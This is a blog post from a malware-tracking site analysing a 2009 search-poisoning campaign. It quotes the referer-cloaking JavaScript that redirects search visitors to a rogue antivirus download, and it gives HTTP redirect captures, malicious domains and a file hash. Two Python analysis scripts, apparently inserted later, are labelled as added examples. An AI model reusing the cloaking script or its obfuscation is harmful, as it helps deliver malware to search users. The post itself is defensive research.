Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 14 May 2009

Google poisoning, IST, rogues and 250+ reasons to avoid 209.44.* ......

Following on from the IST (Internet Service Team) and their blackhat SEO involving Google, we've got yet another example of Google poisoning, this time from Netelligent Hosting Services Inc and going via SteepHost and Layered Tech.

Unlike the previous one, which contained the script directly, this one contains random rubbish on the site itself but loads a file called script.js;



vURL Online - Dissect - http://test-file-and-windows-defender.mycepi.net
http://vurl.mysteryfcm.co.uk/?url=618085

script.js is pretty much the same as the last one, in that it checks the referer and ONLY redirects to the malware if you've come from a search engine result;

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://test-file-and-windows-defender.mycepi.net/script.js
Server IP: 206.51.236.156 [ hv101.steephost.com ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 01:58:33:58
*****************************************************************
var Ref=document.referrer;

// Hidden POST form pointing at the redirector. The target URL is built from
// split pieces ('h' + 't' + 't' + 'p://zod' + 'une.info/') so a plain string
// search of the file for the domain finds nothing; the search query and both
// the search-engine referer and the landing page URL are passed along.
document.write('<form id="go" method=POST action="h' + 't' + 't' + 'p://zod' + 'une.info/' + 'search.php?q=test+file+and+windows+defender'+'&seref='+encodeURIComponent(document.referrer)+'&ref='+encodeURIComponent(document.URL)+'" style=display:none></form>');
// Hidden GET form pointing at google.com, used for everyone else.
document.write('<form id="go2" method=get action="h' + 't' + 't' + 'p://goo' + 'gle.com/'+'" style=display:none></form>');
function pr(sSearch)
{
var f = document.getElementById("go");
f.submit();
}
function goog()
{
var f = document.getElementById("go2");
f.submit();
}

// Only visitors whose referer looks like a search engine (or contains the
// word "search" at all) get the rogue; anyone loading the page directly,
// including a crawler or an analyst, is sent to Google instead.
if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.msn.')!=-1 || Ref.indexOf('.live.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('search')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1)
{
pr('');
}else
{
goog();
}


If you've NOT come from a search engine result, you're taken directly to Google.com.
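Because the script hides its targets by splitting string literals and shows different behaviour depending on the referer, an analyst wants two things from it without running it: the real URLs, and which referers trigger the redirect. The following Python is an added example (not from the post and not hpHosts tooling); SAMPLE_JS is a constructed, shortened copy of the script quoted above, and the literal-joining regex assumes the simple single-quoted, one-line concatenation this script uses.

```python
import re

# Constructed sample input: the referer-cloaking script quoted above, cut down
# to the two hidden forms and the referer test (query string shortened).
SAMPLE_JS = r"""var Ref=document.referrer;
document.write('<form id="go" method=POST action="h' + 't' + 't' + 'p://zod' + 'une.info/' + 'search.php?q=test'+'&seref='+encodeURIComponent(document.referrer)+'" style=display:none></form>');
document.write('<form id="go2" method=get action="h' + 't' + 't' + 'p://goo' + 'gle.com/'+'" style=display:none></form>');
if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('search')!=-1)
{ pr(''); } else { goog(); }
"""

# Two adjacent single-quoted literals glued with '+', on one line, no escapes
# (enough for this script; arbitrary JS would need a real tokenizer).
_CONCAT = re.compile(r"'([^'\n]*)'\s*\+\s*'([^'\n]*)'")

def join_split_strings(js: str) -> str:
    """Fold 'h' + 't' + 't' + 'p://...' back into one literal, to a fixpoint."""
    prev = None
    while prev != js:
        prev = js
        js = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", js)
    return js

def extract_urls(js: str) -> list:
    """URLs that only become visible once the split literals are rejoined."""
    return re.findall(r"https?://[^\s'\"<>]+", join_split_strings(js))

def referer_triggers(js: str) -> list:
    """Substrings whose presence in document.referrer selects the cloaked path."""
    return re.findall(r"\.indexOf\('([^']+)'\)\s*!=\s*-1", js)

def cloaked_target(js: str, referer: str) -> str:
    """Replay the script's branch for a given referer: the first form target
    (the redirector) for search-engine traffic, the second (Google) otherwise."""
    rogue, benign = extract_urls(js)[:2]
    return rogue if any(t in referer for t in referer_triggers(js)) else benign

if __name__ == "__main__":
    print(extract_urls(SAMPLE_JS))
    print(referer_triggers(SAMPLE_JS))
    # Fetching the page with no referer shows only the Google redirect.
    print(cloaked_target(SAMPLE_JS, ""))
    print(cloaked_target(SAMPLE_JS, "http://www.google.co.uk/search?q=hphosts"))
```

The practical point for detection is the last call: the same page fetched without a search-engine referer looks harmless, so a scanner has to supply one to see the rogue path.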

vURL Online - Dissect - http://test-file-and-windows-defender.mycepi.net/script.js
http://vurl.mysteryfcm.co.uk/?url=618087

If, however, you've come from a search engine such as Google, you're taken instead, via zodune.info (72.232.117.65), to bestwebscantools.com (209.44.126.241);

POST /search.php?q=test+file+and+windows+defender&seref=http%3A%2F%2Fwww.google.co.uk%2Fsearch%3Fq%3Dhphosts%26hl%3Den%26tbs%3Dqdr%3Am%26start%3D110%26sa%3DN&ref=http%3A%2F%2Ftest-file-and-windows-defender.mycepi.net%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://test-file-and-windows-defender.mycepi.net/
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: zodune.info
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache
Cookie: s=0

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 06:07:17 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/4.4.7 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.7
Set-Cookie: s=1; expires=Fri, 15 May 2009 07:07:17 GMT
Location: http://bestwebscantools.com/page.php?id=64
Keep-Alive: timeout=4, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

GET /page2.php?id=64 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://test-file-and-windows-defender.mycepi.net/
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Connection: Keep-Alive
Pragma: no-cache
Host: bestwebscantools.com

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 01:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
location: index.php?c=0&e=0&affid=08064
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
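To turn a capture like the one above into a hop list, here is an added Python example (not from the post); RAW_CAPTURE is a constructed, condensed copy of the exchange above keeping only the headers that matter. It pairs each request with its response, treats header names case-insensitively (note the lowercase "location:" in the second response) and resolves that relative Location against the request URL the way a browser would, then flags hops where the next request is not the URL the previous response pointed to.

```python
from urllib.parse import urljoin

# Constructed sample, condensed from the capture above: request, blank line,
# response, blank line, next request, and so on.
RAW_CAPTURE = """POST /search.php?q=test+file+and+windows+defender HTTP/1.1
Referer: http://test-file-and-windows-defender.mycepi.net/
Host: zodune.info

HTTP/1.1 302 Found
Location: http://bestwebscantools.com/page.php?id=64

GET /page2.php?id=64 HTTP/1.1
Host: bestwebscantools.com

HTTP/1.1 302 Found
location: index.php?c=0&e=0&affid=08064
"""

def parse_messages(raw):
    """Split the capture into (start line, headers) blocks. Header names are
    case-insensitive, so 'location:' and 'Location:' must land in one key."""
    messages = []
    for block in raw.strip().split("\n\n"):
        lines = block.splitlines()
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        messages.append((lines[0], headers))
    return messages

def redirect_chain(raw):
    """Pair requests with responses and return (method, url, status, target);
    a relative Location is resolved against the request URL, as a browser does."""
    msgs = parse_messages(raw)
    hops = []
    for (req, req_h), (resp, resp_h) in zip(msgs[0::2], msgs[1::2]):
        method, path, _ = req.split(" ", 2)
        url = "http://" + req_h["host"] + path
        status = int(resp.split()[1])
        target = None
        if 300 <= status < 400 and "location" in resp_h:
            target = urljoin(url, resp_h["location"])
        hops.append((method, url, status, target))
    return hops

def chain_gaps(hops):
    """Hops whose next request is not the URL the previous response gave (in
    the capture above, page.php is followed by a request for page2.php)."""
    return [(a[3], b[1]) for a, b in zip(hops, hops[1:]) if a[3] != b[1]]
```

A gap reported by chain_gaps means the capture is incomplete or something client-side intervened between the two hops, so it is worth re-recording before listing the intermediate URL.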


Where you're presented with the following scare tactics;





Unfortunately, 99% of you have JavaScript and ActiveX enabled so you can see those lovely little Flash movies, so instead of just seeing a yellow bar mentioning an ActiveX control being unable to run, you're going to have the site automagically download its crap from;

install.exe - MD5: 924393ff9b991829ade66d9fe21bc29f
hxxp://bestwebscantools.com/download.php?affid=08064

Ref:
http://virusscan.jotti.org/en/scanresult/6ec4960b0d568fde522926a3505722e38f60c6ea
http://www.threatexpert.com/report.aspx?md5=924393ff9b991829ade66d9fe21bc29f

This package is 466KB of roguerific goodness called System Security 2009, and is a WinWebSecurity variant. This particular variant is currently only detected by a-Squared (Trojan.Win32.Winwebsec!IK), Malwarebytes Anti-Malware, BitDefender (Gen:Trojan.Heur.HY.D1827D7D7D) and Ikarus (Trojan.Win32.Winwebsec).

bestwebscantools.com, like all of the rest, shares its IP address with a whole host of rogueified goodness, 250+ hostnames in all.



Sadly, Anubis doesn't seem to be feeling too well at the moment, as it errored out when I tried submitting the file to it, so I submitted it to JoeBox and ThreatExpert instead. The Threat Expert report is referenced above, but JoeBox haven't gotten back to me yet, so I'll post that when it comes through.

In the meantime, feel free to go have a shout at the hosting companies providing the hosting for this rubbish.
